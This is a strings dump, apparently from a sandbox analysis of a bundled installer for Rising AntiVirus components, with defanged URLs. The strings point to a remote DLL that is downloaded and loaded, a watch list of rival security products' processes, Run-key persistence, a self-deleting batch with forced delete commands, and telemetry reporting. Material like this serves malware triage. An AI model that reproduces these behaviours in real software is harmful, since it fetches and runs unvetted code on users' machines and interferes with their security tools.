\lics%d.txt

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

{X-X-X-XX-XXXXXX}.bmp

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SHFolder.dll

Shell32.dll

HKEY_LOCAL_MACHINE\%s\%s

%snserver.exe

%sRsTest.ini

Software\Microsoft\Windows\CurrentVersion

nserver.exe

%FIRSTPART%

%COMMONDIR%

%DOMINODATA%

%DOMINODIR%

%SYSDIR64%

%SYSDIR%

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX

[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!

[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).

RsConfig.cfg

[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).

[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).

RSAPPMGR.DLL

\RSAPPMGR.DLL

comx3.dll

%s>

standalone="%s"

encoding="%s"

version="%s"

%s='%s'

%s="%s"

\RsLang.dll

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

System\CurrentControlSet\Services\VxD\MSTCP

255.255.255.255

socket() failed; %d

Range: bytes=%d-

hXXp://

portuguese-brazilian

.rstmp

1.1.3

C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb

GetProcessHeap

SetNamedPipeHandleState

WaitNamedPipeA

GetWindowsDirectoryA

KERNEL32.dll

MsgWaitForMultipleObjects

ExitWindowsEx

EnumWindows

EnumChildWindows

USER32.dll

comdlg32.dll

RegCloseKey

RegOpenKeyExA

RegCreateKeyA

RegOpenKeyA

RegCreateKeyExA

RegDeleteKeyA

RegSetKeySecurity

RegGetKeySecurity

RegQueryInfoKeyA

RegEnumKeyExA

ADVAPI32.dll

ShellExecuteExA

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

RPCRT4.dll

InternetCrackUrlA

HttpQueryInfoA

HttpSendRequestA

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

VERSION.dll

WSOCK32.dll

GetCPInfo

11166666600000000000000/////////.....""""""""""""""""--- .DDDDDDDDDDDDDDDDDDDDDDDDDDBBBBBB

>VVVVVVVVVVVVYYYY:Y:YYV8888888888888.ppMs3llkxNqKKqK

!'!555''''

!! **""!

#### # # # # # # # #

6,,,6,,6,66

,,,,66,,6,

6,,,,6,,,

555555555555555

666666666666666666

888888888

CC.CCCCCC6hML7L77L789;nOOOOOOOO8

...CCCCCC6hMLL7777789;

...CCCCCC6hML77777789;

"""!"!"!"

1111111111111000000

!%%&11&&&

23333333333333333333

3333343333333333334

443434333333333333

#34344443344333343

3444444444444

444444444444

7676676676676676

7777777777777

77777777777

>889889889889883$3

/2$ÝDD

4::-...,..,,,, %

7766666666666666666666601$ÞDE

000000000000011110

"#%DPTVVVVVVPO%%"L

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

6'6.6>6>7

9#939:9[9

; ;$;(;,;0;4;8;/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
)rackUrl3&
4{Z'rS%sT%sT%sT%sT$rR#sR"mN
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
It is strongly recommended to close all Windows program before running the setup program.
Password:
This module need %fM
1.0.0.2
Setup.EXE
20140619153336140
ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.
 Totally scaned %d files, found %d viruses.
Export,Unable to Create File Folder: %s , continue?
This version [version:%s] is older than your current installed [version:%s]
Continue to install Rising AntiVirus Software[version:%s]?
%Click "Next" to continue installation
jSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.
KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.
!Version: %s Update Date: %s
$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfully
Password is error7update is completed, windows need reboot for copy file.
install1393485.exe_1148_rwx_00401000_001FC000:\rsdebug.ini
c:\%s
dbghelp.dll
kernel32.dll

d-d-d(d-d-d)

Kernel32.dll

\rsmain.exe

[d-d-d][d:d:d:d]

%s\%s

%s\*.*

C:\Temp

SOFTWARE\Rising\%s

2.log

[u]

[0xX]

RAV.INI

\Rs7zSfx.log

\setup.dll

CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}

%s\CompsVer.inf

Setup.exe

%s\auto.ini

@Sleep...%d

%s Start

%s End

{E5C53971-D80E-4500-BE0D-761BF3CD8457}

Unsupported Method

Password is not defined

mscoree.dll

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

user32.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

CLSID\{CAA2D3B2-4BB5-4a45-A17A-122773379D99}

XXXXXXXXXXX

{X-X-X-XX-XXXXXX}

\NetConfig.ini

{"vkey": "%s", "guid": "%s", "sguid": "%s", "actionid": "%s", "tag": "%s","step": "%s",

"result": "%s", "errorcode": "%s", "remark": "%s", "pa": "%s", "pb": "%s"}

Label.dat

hXXp://center.rising.com.cn/urg.asp?v=%s&t=%s&a=%s

%sbase

Iphlpapi.dll

\\.\PhysicalDrive%d

\\.\Scsi%d:

MSIE %d.%d

WININET.DLL

Windows

Windows Me

Windows 98

Windows 95

Windows NT %d.%d

%s:%d

Mozilla/4.0 (compatible; %s; %s; Rising)

Content-Type: application/x-www-form-urlencoded

HTTP/1.0

C:\DistributedAutoLink\Temp\CompileOutputDir\7zSfx.pdb

COMCTL32.dll

GDI32.dll

restorelog.txt

zcÁ

T3%dU

K.ZuNN

)$OI%f

B.Yo@

26.Ip

up.yF

~mM.Bv

qPndR.Ts

Thawte Certification1

hXXp://ocsp.thawte.com0

.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0

hXXp://ts-ocsp.ws.symantec.com07

 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
hXXp://sf.symcb.com/sf.crl0f
hXXps://d.symcb.com/cps0%
hXXps://d.symcb.com/rpa0
hXXp://sf.symcd.com0&
hXXp://sf.symcb.com/sf.crt0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/rpa0
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
z.oao
].XcG
~jq.wz
.FDF`O
;.bd/
:U%SN
ej.CC
`X.UT?.
.lqwD
*e_!.sWI$`
]>!.gB
k.Rrt
TCP_yy
%S5]*
.fb#c$Z4
h[%D}_
$T.Ia
V.jurV
Sù,
T%xYS3
9kl.Uw
We]%F
u.zQ0
4\ R%d
.qJ4C9.
T@M.Ng
 y.Di
vJY.lNk'1
.Gi#O$@$
~D.Hh
U.LZe
yo.NRL;
.npr =
y/"Z.Jn(
Diurl
A.Ot=_d
.psd x
}.eNk^6E
@%X;g
~gq%c^
;.Aum
_6}"%_^&
36.hU
S}i;%u
$.dls
iY.Ub
%cUNXEHJJGA[.Oj
S.lW"
.hw1.
.CB5t
.MAF!
|%X3j
.aRSr
".xNT
3.Mh)
X2.Wq
B%.GMK
8&H8.VW
a%s%s
.dk:8e`
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\RsdSfxTmp
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe
.text
`.rdata
@.data
.rsrc
@.reloc
QSVSSSh
>%uPV
|$D.tD
.tgPV
FTPjK
FtPj;
C.PjRVj
u.VV3
|$$vL9|$ u%Sh
Advapi32.dll
Explorer.exe
NtDll.dll
%d %d %d %d
Failed to call WTSQueryUserToken, err= 0x%x
wtsapi32.DLL
Could not open pipe
SetNamedPipeHandleState failed
\\.\pipe\RISING_RSD_BU
%*.*f
/RUNAS %s
Failed to load psapi.dll.
Psapi.dll
Setup.exe End with ErrorCode: 0xX
hXXp://center.rising.com.cn/LogCenter.asp?info=%s
Key=%s&v1=%s&v2=%s&v3=%s&v4=%s&v5=%s
Password
Port
%s\Data\%s\%s.ini
setup.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
%s(%s)
ReportView
KERNEL32.DLL
SetWillReboot(%d)
Failed to call QueryServiceStatus(RSD)! Err Code: %d
Failed to call OpenService(RSD)! Err Code: %d
Failed to call OpenSCManager! Err Code: %d
\RsTest.ini
ÞSKTOP%
\label.dat
\Backup.ini
\Export.ini
\XMLS\RSSetup.xml
\Setup.exe
\*.exe
\XMLS\Setup.xml
\os.xml
/PASS=
/PRODUCT=%s
/LANG=%d
HKEY_LOCAL_MACHINE\SoftWare\Rising\%s
ITEM%d
UPDATEXMLURL

d-d-- d:d

Setup.dll

Local_RSD_Setup_%s

Global\Rising_RSD_Setup_%s

Rising_RSD_Setup_%s

\Backup\RSD\RSSetup\RSSetup.xml

\RSSetup.xml

\CompsVer.inf

AddPCAExclude return: %d

Open Key Failed!

Create Key Failed!

Query Value Failed! Return: %d

%s\Setup.exe

SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags

AddPCAExclude(%d)

Setup.xml

\Setup.xml

12345678.000

Create Temp Cfg From %s to %s

rd /q %s

rd /s /q %s

if exist %s goto repeat

del /s /q /f %s

\DelSelf.bat

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SetFileSecurity() failed. Error %d

SetSecurityDescriptorControl() failed.Error %d

GetSecurityDescriptorControl() failed.Error %d

SetSecurityDescriptorDacl() failed. Error %d

AddAce() failed. Error %d

GetAce() failed. Error %d

AddAccessAllowedAce() failed. Error %d

AddAccessAllowedAceEx() failed. Error %d

advapi32.dll

InitializeAcl() failed. Error %d

HeapAlloc() failed. Error %d

GetAclInformation() failed. Error %d

GetSecurityDescriptorDacl() failed. Error %d

InitializeSecurityDescriptor() failed.Error %d

GetFileSecurity() failed. Error %d

InitializeSid() failed. Error %d

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

WinSessionThread GetPidByName dwPID = %d , name=%s!

WTSQueryUserToken Failed! Err Code: %d

OpenProcess Failed! Err Code: %d

GetProcAddress(OpenProcessToken) Failed! Err Code: %d

OpenProcessToken Failed! Err Code: %d

GetLogonUserToken(%d)

CreateProcess2 Return: %d

LoadLibrary Failed! Err Code: %d

CreateEnvironmentBlock Failed! Err Code: %d

DuplicateTokenEx Failed! Err Code: %d

CreateProcessWithTokenW Failed! Err Code: %d

Userenv.DLL

GetFileAttributes %s return: %d

Delete File %s fail, Err: %d

Wow64DisableWow64FsRedirection Return: %d

Wow64RevertWow64FsRedirection Return: %d

RsInstallService(%s) Return: %d

ChangeServiceConfig Failed! Err Code: %d

CreateService Failed! Err Code: %d

OpenSCManager Failed! Err Code: %d

RsInstallService(%s)

RsUninstallService(%s) Return: %d

DeleteService Failed! Err Code: %d

OpenService Failed And Service Already Exist! Err Code: %d

RsUninstallService(%s)

OpenService Failed! Err Code: %d

LoadLibrary(Advapi32.dll) Failed!

RsSetServiceFailureAction(%s) Return: %d

GetProcAddress(%s) Failed!

ChangeServiceConfig2 Failed! Err Code: %d

RsSetServiceFailureAction(%s)

QueryServiceStatus Failed! Err Code: %d

StartService Failed! Err Code: %d

RsStartService(%s)

Wait for Service %s Time Out!

QueryServiceStatus(%s) Failed! Err Code: %d

ControlService(%s) SERVICE_CONTROL_STOP Failed! Err Code: %d

HeapAlloc Failed! Err Code: %d

EnumDependentServices Failed! Err Code: %d

Stop Service %s Dependencies...

%s's Stop is Pending...

Service %s is Stopped...

OpenService(%s) Failed! Err Code: %d

RsStopService(%s)

Rs%sInstallCom(%s) Return: %d

LoadLibrary(%s) Failed!

%s Failed! ErrMsg: %s

Rs%sInstallCom(%s)...

WinSessionThread CreateProcess ret = %d end !

WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !

WinSessionThread CreateProcess begin dwSessionID = %d!

WININIT.INI

\WININIT.INI

HKEY_CURRENT_CONFIG

"%s" %s

\RsMgrSvc.ini

Save DELETEPATH %s to RsMgrSvc.ini

Save REBOOTRUN %s to RsMgrSvc.ini

%s Loaded By %s

EXPLORER.EXE

Setup.exe Begin----------------------------------

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

StopComponent(%s)...

StartComponent(%s)...

Report Error!

Call Component %s Dll_PreHandle Return: 0xX

Call Component %s Dll_PostHandle Return: 0xX

Check XML File %s Failed

Check File %s Failed

BackUp XML File From: %s To %s

Delete XML File: %s

Copy XML File From: %s To %s

%s\RsMgrsvc.ini

URLInfoAbout

hXXp://help.ikaka.com/

"%s" /UNINSTALL /PRODUCT=%s

"%s" /UNINSTALL /PRODUCT=RSD

Delete File %s

Copy File From %s To %s

CompsVer.inf

Copy Path From %s To %s

Down Load %s To Path: %s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\currentversion\run

RunFirstInstall Successfully...NeedReboot: %d

InstallComponentList Failed! Error Code: 0xX

PreHandleComponentList Failed! Error Code: 0xX

Product_PreHandle Failed! Error Code: 0xX

BackUpComponentList Failed! Error Code: 0xX

CheckComponentList Failed! Error Code: 0xX

RunFirstInstall, AfterReboot: %d

RavTmp: %s

file not exist : %s

succeed to download %s

Failed to download %s. ErrCode = %d; hr = %d

Failed to verify %s

%s%s/%s%s.inf

Failed to get download url from %s

URLLIST

Failed to load %s.

%s%s/%s/%s/%s

%s\%s\%s\%s

%s%s/%s/%s

%s\%s\%s

Failed to get %s-ITEM.

Failed to get %s-FILES.

Failed to get %s-COMPONENT.

Download %s retry > 3

%s/%s/%s_xml.zip

%s\%s\%s.xml

%s%s/%s/%s.xml

Failed to get %s' newver from %s

SCMD

REGVERKEY

REGKEYVALUE

REGKEYNAME

REGKEY

Set File %s Everyone Access Rights 0xX return: %d

Set File %s Users Access Rights 0xX return: %d

Delete File Return: %d, NeedReboot: %d

Prepare To Delete File %s...

Back Up File From: %s To: %s Return: %d

Skip Backing Up File %s For Checked OK...

Copy File Return: %d, NeedReboot: %d

MoveFile From %s To %s

Prepare To Copy File From %s To %s...

TaskbarPin = 0x%x

Install Link: %s

Delete Link: %s

TaskbarunPin = 0x%x

Old Link File: %s

SUBKEY

Set Key %s Everyone Access Rights 0xX return: %d

Set Key %s Users Access Rights 0xX return: %d

REGKEYDATATYPE

Install Key KeyName: %s, ValueName: %s, Value: %s, DataType: %d Return: %d

Backup Key Value Return: %d

microsoft\windows\currentversion\run

Restore Key Value Return: %d

UnInstall Key KeyName: %s, ValueName: %s Return: %d

Execute langsel.exe

langsel.exe

Setup Log (*.log)

*.log

A%d M

ÚTADIR%

Need Reboot, Add DeletePath Task To Server: %s

No Reboot, RsDeletePath(%s)

\lics%d.txt

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\

{X-X-X-XX-XXXXXX}.bmp

SOFTWARE\Microsoft\Windows NT\CurrentVersion

SHFolder.dll

Shell32.dll

HKEY_LOCAL_MACHINE\%s\%s

%snserver.exe

%sRsTest.ini

Software\Microsoft\Windows\CurrentVersion

nserver.exe

%FIRSTPART%

%COMMONDIR%

%DOMINODATA%

%DOMINODIR%

%SYSDIR64%

%SYSDIR%

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

[INF]CRsConfigBase::InitializeRsConfig: GetPath(PathSize=%d),Result=0xX

[ERR]CRsConfigBase::InitializeRsConfig: QueryInterface RSIID_IRSCfgMgr Failed(Result=0xX)!

[ERR]CRsConfigBase::InitializeRsConfig:CreateAppEnv Failed(Result=0xX).

RsConfig.cfg

[ERR]CRsConfigBase::InitializeRsConfig:QueryInterface RSIID_IRSAppMgr failed(Result=0xX).

[ERR]CRsConfigBase::InitializeRsConfig:CreateObject RSID_RSAppMgr failed(Result=0xX).

RSAPPMGR.DLL

\RSAPPMGR.DLL

comx3.dll

%s>

standalone="%s"

encoding="%s"

version="%s"

X;

%s='%s'

%s="%s"

\RsLang.dll

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

System\CurrentControlSet\Services\VxD\MSTCP

255.255.255.255

socket() failed; %d

Range: bytes=%d-

hXXp://

portuguese-brazilian

.rstmp

1.1.3

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

C:\DistributedAutoLink\Temp\CompileOutputDir\Setup.pdb

GetProcessHeap

SetNamedPipeHandleState

WaitNamedPipeA

GetWindowsDirectoryA

KERNEL32.dll

MsgWaitForMultipleObjects

ExitWindowsEx

EnumWindows

EnumChildWindows

USER32.dll

comdlg32.dll

RegCloseKey

RegOpenKeyExA

RegCreateKeyA

RegOpenKeyA

RegCreateKeyExA

RegDeleteKeyA

RegSetKeySecurity

RegGetKeySecurity

RegQueryInfoKeyA

RegEnumKeyExA

ADVAPI32.dll

ShellExecuteExA

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

RPCRT4.dll

InternetCrackUrlA

HttpQueryInfoA

HttpSendRequestA

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

VERSION.dll

WSOCK32.dll

GetCPInfo

11166666600000000000000/////////.....""""""""""""""""--- .DDDDDDDDDDDDDDDDDDDDDDDDDDBBBBBB

>VVVVVVVVVVVVYYYY:Y:YYV8888888888888.ppMs3llkxNqKKqK

!'!555''''

!! **""!

#### # # # #  # # # #

6,,,6,,6,66

,,,,66,,6,

6,,,,6,,,

555555555555555

666666666666666666

888888888

CC.CCCCCC6hML7L77L789;nOOOOOOOO8

...CCCCCC6hMLL7777789;

...CCCCCC6hML77777789;

"""!"!"!"

1111111111111000000

!%%&11&&&

23333333333333333333

3333343333333333334

443434333333333333

#34344443344333343

3444444444444

444444444444

7676676676676676

7777777777777

77777777777

>889889889889883$3

/2$ÝDD

4::-...,..,,,, %

7766666666666666666666601$ÞDE

000000000000011110

"#%DPTVVVVVVPO%%"L

version="1.0.0.0"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

6'6.6>6>7
29#939:9[9
; ;$;(;,;0;4;8;/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
)rackUrl3&
It is strongly recommended to close all Windows program before running the setup program.
Password:
This module need %fM
1.0.0.2
Setup.EXE
20140619153336140
ECan't create the destination folder, please check and input it again.APlease take off your CD avoiding to restart from CDROM next time.
 Totally scaned %d files, found %d viruses.
Export,Unable to Create File Folder: %s , continue?
This version [version:%s] is older than your current installed [version:%s]
Continue to install Rising AntiVirus Software[version:%s]?
%Click "Next" to continue installation
jSystem comctl32.dll version is lower than 4.70!\please upgrade it through installing IE4 or above version.
KYou have install follow Rising product, this product can't install whit it.FLast Rising setup progress is not completed, please reboot your systemNRising Anti-virus software has been uninstalled successfully but follow files.
!Version: %s Update Date: %s
$Add or remove same component please!(%d second left to auto close this dialog8Rising Anti-virus software has been updated successfully
Password is error7update is completed, windows need reboot for copy file.
RsMgrSvc.exe_1936:.text
`.rdata
@.data
.rsrc
t%ShH;B
|$D.tD
CryptDecodeObject failed with %x
wintrust.dll
WTHelperGetProvCertFromChain
CryptCATCatalogInfoFromContext
crypt32.dll
CryptMsgGetParam
CryptSIPVerifyIndirectData failed with %x
1.3.6.1.4.1.311.2.1.4
CryptMsgGetParam(%d) failed with %x
CryptSIPRetrieveSubjectGuid failed with %x
CryptQueryObject failed with %x
\\.\PhysicalDrive%d
\\.\Scsi%d:
Iphlpapi.dll
Software\Microsoft\Windows\CurrentVersion
Advapi32.dll
\Rising\RSD\RsMgrSvc.exe"
Explorer.exe

XXXXXXXXXXX

{X-X-X-XX-XXXXXX}

CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

[d-d-d][d:d:d:d]

SHFolder.dll

Shell32.dll

SOFTWARE\Rising\%s

2.log

[u]

[0xX]

RAV.INI

WinSessionThread GetPidByName dwPID = %d , name=%s!

NtDll.dll

Kernel32.dll

WTSQueryUserToken Failed! Err Code: %d

wtsapi32.DLL

OpenProcess Failed! Err Code: %d

GetProcAddress(OpenProcessToken) Failed! Err Code: %d

OpenProcessToken Failed! Err Code: %d

GetLogonUserToken(%d)

>`userinit.exe

CRsMgrSvc::WaitForLogonNT:LoadLibrary(_"psapi.dll");err=0x%x

psapi.dll

Fail to OpenProcessToken; 0x%x

Failed to call CreateProcessAsUser again: appname = %s cmd=%s;err=0x%x.

Failed to SetTokenInformation(0):err=0x%x

Failed to call CreateProcessAsUser:cmd=%s;err=0x%x.

Failed to DuplicateTokenEx:err=0x%x

Failed to SetTokenInformation:err=0x%x

SessionId = %d

Failed to LoadLibrary("Wtsapi32.dll"):err=0x

Failed to call WTSEnumerateSessions:err=0x%x

SessionInfo[%d]: SessionId=%d; WinStationName=%s; State=%d.

Wtsapi32.dll

Failed to CreateProcess:%s;err=0x%x

Failed to LoadLibrary("Wtsapi32.dll"):err=0x%x

Failed to WTSEnumerateSessions:err=0x%x

Session\%d\RSD_POP_MESSAGE_INFO

WinSessionThread CreateProcess ret = %d end !

WinSessionThread CreateProcess pid = %d, CreateProcessAsUser err = %d !

Userenv.DLL

WinSessionThread CreateProcess begin dwSessionID = %d!

Failed to LoadLibrary("Userenv.DLL"):err=0x%x

Failed to call CreateProcessAsUser: cmd=%s;err=0x%x.

New Failed to call WTSQueryUserToken, err= 0x%x

rsmsg

%s\rsmsginfo.ini

Failed to open the shell ready event: 0x%x

"%s" /shellrun

%s\RsStub.exe

Session\%d\ShellReadyEvent

LogonRun - session : %d

Failed to call RegOpenKeyEx, err = 0x%x

Failed to call RegSaveKey, err = 0x%x

Failed to call AdjustTokenPrivileges, err = 0x%x

Failed to call OpenPrcessToken, err = 0x%x

%s\RsMgrSvc.dat

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s

BaiduAnSvc.exe

BaiduSdSvc.exe

liebao.exe

ksafe.exe

{849B7E2B-0551-429C-B317-14B7D374D6EC}_is1

kxescore.exe

QQPCRtp.exe

360sd.exe

360se.exe

{23F3F476-BE34-4f48-9C77-2806A8393EC4}

360Desktop.exe

ZhuDongFangYu.exe

safeboxTray.exe

Failed to Create LogonRunThread Thread, err = 0x%x

SessionChange:EventType=%d; sessionID = %d

\Backup\RSD\RSSetup\RSSetup.xml

rsup10.rising.com.cn

u.suxiazai.com

%s?t=0&info=%s

ver=%s&guid=%s&sguid=%s&state=%s

hXXp://u.suxiazai.com/menu/info.xml

hXXp://rsup10.rising.com.cn/menu/info.xml

%srsd\info.xml

/subkey

Failed to Verify the "%s".

Failed to call vf.Init.

%s\rsbackup.exe

"%s\rsbackup.exe"

/subkey

%s\RsMgrSvc.ini

%s\updater.exe

"%s\updater.exe"

DeleteFile: %s.

ITEM%d

\RsMgrSvc.ini

DeletePath: %s.

Clean WillReboot In %s

%s\%s\%s.ini

1971-01-01 00:00:00

%d-%d-%d %d:%d:%d

%s\Data

%s /subkey %s /RsMgrSvc

"%s\Updater.exe" /silence

%s\Updater.exe

\Reboot.ini

CRsMgrSvc::SVC:Failed to CreateEvent-Wait: err=0x%x

CRsMgrSvc::SVC:Failed to CreateEvent, err=0x%x

comx3.dll

KERNEL32.DLL

kernel32.dll

MSIE %d.%d

WININET.DLL

Windows

Windows Me

Windows 98

Windows 95

Windows NT %d.%d

%s:%d

Mozilla/4.0 (compatible; %s; %s; Rising)

HTTP/1.0

Range: bytes=%d-

RstoreDll.dll

@CRsUseRepairProduct::prstorestart %s Dllpath:%s

@CRsUseRepairProduct::prstorestart %s

Subkey: %s could not find dllPath ,so use rsd path:%s

Subkey: %s Path:%s

\RstoreDll.dll

02%d.d.d.d

CRsLoadCloud::DownLoadCldRsdDll... faild hre = %d ,lasterror = %d

CRsLoadCloud::LoadCldRsdDll... failed lasterror = %d

CRsLoadCloud::LoadCldRsdDll...%s

CRsLoadCloud::StartTask...success

CRsLoadCloud::InitData... CopyFile flag= %d.

hXXp://download.suxiazai.com/for_down/2013/new/dlls/CldRsd.dll

CldRsd.dll

mscoree.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

user32.dll

C:\DistributedAutoLink\Temp\CompileOutputDir\RsMgrSvc.pdb

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

RegEnumKeyExA

RegCreateKeyA

RegOpenKeyA

RegSaveKeyA

RegQueryInfoKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

CryptMsgClose

CertCloseStore

CertGetNameStringW

CertFindCertificateInStore

CRYPT32.dll

RPCRT4.dll

InternetCrackUrlA

HttpQueryInfoA

HttpSendRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

WININET.dll

VERSION.dll

GetProcessHeap

GetCPInfo

zcÁ

%Program Files%\Rising\RSD\RsMgrSvc.exe.log

%Program Files%\Rising\RSD\RsMgrSvc.exe

.Beijing Rising Information Technology Corporation Limited

1.0.0.50

RsMgrSvc.exe

20150423153938597

install1393485.exe_1148_rwx_10072000_00001000:

SetWillReboot(%d)

Failed to call QueryServiceStatus(RSD)! Err Code: %d

Failed to call OpenService(RSD)! Err Code: %d

Failed to call OpenSCManager! Err Code: %d

\RsTest.ini

ÞSKTOP%

\label.dat

\Backup.ini

\Export.ini

\XMLS\RSSetup.xml

\Setup.exe

\*.exe

\XMLS\Setup.xml

\os.xml

Label.dat

/PASS=

/PRODUCT=%s

/LANG=%d

HKEY_LOCAL_MACHINE\SoftWare\Rising\%s

ITEM%d

UPDATEXMLURL

d-d-- d:d

Setup.dll

Local_RSD_Setup_%s

Global\Rising_RSD_Setup_%s

Rising_RSD_Setup_%s

\Backup\RSD\RSSetup\RSSetup.xml

\RSSetup.xml

\CompsVer.inf

AddPCAExclude return: %d

Open Key Failed!

Create Key Failed!

Query Value Failed! Return: %d

%s\Setup.exe

SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags

AddPCAExclude(%d)

Setup.xml

\Setup.xml

12345678.000

Create Temp Cfg From %s to %s

rd /q %s

rd /s /q %s

if exist %s goto repeat

del /s /q /f %s

\DelSelf.bat

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SetFileSecurity() failed. Error %d

SetSecurityDescriptorControl() failed.Error %d

GetSecurityDescriptorControl() failed.Error %d

SetSecurityDescriptorDacl() failed. Error %d

AddAce() failed. Error %d

GetAce() failed. Error %d

AddAccessAllowedAce() failed. Error %d

AddAccessAllowedAceEx() failed. Error %d

advapi32.dll

InitializeAcl() failed. Error %d

HeapAlloc() failed. Error %d

GetAclInformation() failed. Error %d

popwndexe.exe_760:

.text

`.rdata

@.data

.rsrc

@.reloc

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

operator

GetProcessWindowStation

USER32.DLL

C:\DistributedAutoLink\Temp\CompileOutputDir\popwndexe.pdb

KERNEL32.dll

ole32.dll

GetProcessHeap

GetCPInfo

GetConsoleOutputCP

cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,

>$>(>,>0>

5(565;5~7

mscoree.dll

KERNEL32.DLL

rsdk.dll

BUF:{E59BC62D-64AB-439D-BAF3-B2D1BA15E441}{4F496E7F-D8FD-4DED-967D-C4F53BFB9452}{216DFF2F-B2F0-4CE0-BA5B-72E0B7BFAC28}{C8CA7580-8E65-49E6-A66A-B087C7EF523D}{5D37C04C-8F58-4D47-94C8-B94153399473}{ED20E0E5-2357-4825-B3FA-198AEC674E81}{AD4F3A47-0CD6-43DE-BC22-E8BE24FFD424}{2100E98D-B13E-4306-8081-50F325B10586}{0AEF80FB-9BAF-4E66-96B3-784ED0FCECF1}{E8D494C-D598-4E2F-B796-809E74315E76}{95EAB9C4-A7F4-46A8-A69F-54911364F2F0}{EBC23555-424F-45C3-BECE-206819CB276B}{4FCE6281-8849-4FC6-A764-95C793EB8A48}{FCA0E62A-5DD4-46FB-AFB2-BDC74EA7DB36}{35FD921E-B758-46D8-B0AA-FCD033B0E66D}{201409F6-22F8-48D3-A69F-7935BDDE6BFA}{787683B8-D58D-4072-BA04-46284CEA5AF8}{224E5B34-E98F-4033-8B6F-46B758E7587E}{23BD3E3A-72ED-4AE4-A5A9-41B466BA8D25}{B769D42A-2392-42B6-8C10-DB99AE23F75A}{1DDF6C09-67B3-4b05-B3A4-43D7D92D067C}{56CF1F5A-D59E-4fe7-BE35-066F4E788E2A}

{{887FE1BB-7C1F-4d73-BD44-B726E1672DC7}}_%s

%Program Files%\Rising\RSD\popwndexe.exe

1.0.0.7

tray.exe

814210592210000

